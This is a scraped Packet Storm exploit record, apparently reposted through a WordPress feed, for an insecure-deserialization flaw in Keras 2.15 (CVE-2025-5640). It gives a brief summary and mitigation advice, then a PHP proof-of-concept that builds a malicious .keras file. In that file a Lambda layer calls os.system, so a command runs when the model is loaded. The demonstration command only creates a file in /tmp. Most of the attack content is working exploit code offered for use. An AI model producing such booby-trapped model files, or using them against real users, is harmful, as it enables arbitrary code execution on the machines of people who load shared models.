{“lastseen”:”2025-12-18T16:39:23″,”description”:”Keras version 2.15 insecure deserialization proof of concept exploit. A security issue in certain versions of Keras allows attackers to craft a malicious model file typically a .keras or HDF5-based model containing unsafe serialization primitives. When…”,”published”:”2025-12-18T00:00:00″,”modified”:”2025-12-18T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Keras 2.15 Insecure Deserialization”,”source”:””,”references”:””,”id”:”PACKETSTORM:213014″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-5640″],”sourceData”:”=============================================================================================================================================\\n | # Title : Keras 2.15 insecure deserialization |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.1 (64 bits) |\\n | # Vendor : https:\/\/keras.io\/ |\\n =============================================================================================================================================\\n \\n [+] References : https:\/\/packetstorm.news\/files\/id\/202894\/ \\u0026 \\tCVE-2025-5640\\n \\n [+] Summary : \\n \\n A security issue in certain versions of Keras allows attackers to craft a malicious model file (typically a .keras or HDF5-based model) \\n containing unsafe serialization primitives. When such a model is loaded, the deserialization process may allow execution of arbitrary functions \\n or system commands if unsafe layers such as Lambda with custom functions are used.\\n This issue arises because the framework may deserialize user-defined functions without full sandboxing or validation, enabling attackers to embed object configurations that trigger execution during model loading.\\n Mitigation requires strict disabling of custom object loading, enforcing safe-load mechanisms, updating to patched versions, and avoiding untrusted model files\\n \\n \\t\\t\\t\\n [+] POC : php poc.php\\n \\n \\u003c?php\\n class SimpleKerasExploit {\\n public function createMaliciousModel($outputFile = \\”malicious_model.keras\\”) {\\n $tempDir = sys_get_temp_dir() . ‘\/keras_’ . uniqid();\\n mkdir($tempDir, 0755, true);\\n \\n \/\/ Create config\\n $config = array(\\n \\”class_name\\” =\\u003e \\”Functional\\”,\\n \\”config\\” =\\u003e array(\\n \\”name\\” =\\u003e \\”pwned_model\\”,\\n \\”layers\\” =\\u003e array(\\n array(\\n \\”class_name\\” =\\u003e \\”Lambda\\”,\\n \\”config\\” =\\u003e array(\\n \\”name\\” =\\u003e \\”evil_lambda\\”,\\n \\”function\\” =\\u003e array(\\n \\”class_name\\” =\\u003e \\”function\\”,\\n \\”config\\” =\\u003e array(\\n \\”module\\” =\\u003e \\”os\\”,\\n \\”function_name\\” =\\u003e \\”system\\”,\\n \\”registered_name\\” =\\u003e null\\n )\\n ),\\n \\”arguments\\” =\\u003e array(‘touch \/tmp\/pwned_simple.keras’)\\n )\\n )\\n )\\n )\\n );\\n \\n file_put_contents($tempDir . ‘\/config.json’, json_encode($config));\\n file_put_contents($tempDir . ‘\/metadata.json’, json_encode(array(\\”keras_version\\” =\\u003e \\”2.15.0\\”)));\\n \\n $zip = new ZipArchive();\\n if ($zip-\\u003eopen($outputFile, ZipArchive::CREATE) === TRUE) {\\n $zip-\\u003eaddFile($tempDir . ‘\/config.json’, ‘config.json’);\\n $zip-\\u003eaddFile($tempDir . ‘\/metadata.json’, ‘metadata.json’);\\n $zip-\\u003eclose();\\n echo \\”\u2705 Malicious model created: $outputFile\\\\n\\”;\\n }\\n \\n \/\/ Cleanup\\n array_map(‘unlink’, glob(\\”$tempDir\/*\\”));\\n rmdir($tempDir);\\n }\\n }\\n \\n $exploit = new SimpleKerasExploit();\\n $exploit-\\u003ecreateMaliciousModel();\\n ?\\u003e\\n \\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/213014″,”cvss”:{“score”:4.8,”severity”:”MEDIUM”,”vector”:”CVSS:4.0\/AV:L\/AC:L\/AT:N\/PR:L\/UI:N\/VC:N\/SC:N\/VI:N\/SI:N\/VA:L\/SA:N”,”version”:”4.0″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:”3.0″,”vectorString”:”CVSS:3.0\/AV:L\/AC:L\/PR:L\/UI:N\/S:U\/C:N\/I:N\/A:L”,”baseScore”:3.3,”baseSeverity”:”LOW”,”attackVector”:”LOCAL”,”attackComplexity”:”LOW”,”privilegesRequired”:”LOW”,”userInteraction”:”NONE”,”scope”:”UNCHANGED”,”confidentialityImpact”:”NONE”,”integrityImpact”:”NONE”,”availabilityImpact”:”LOW”}},”href”:”https:\/\/packetstorm.news\/files\/id\/213014\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-12-18T16:39:23″,”description”:”Keras version 2.15 insecure deserialization proof of concept exploit. A security issue in certain versions of Keras allows attackers to craft a malicious model file…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,75,12,21,13,53,7,11,5],"class_list":["post-31881","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-48","tag-exploit","tag-medium","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n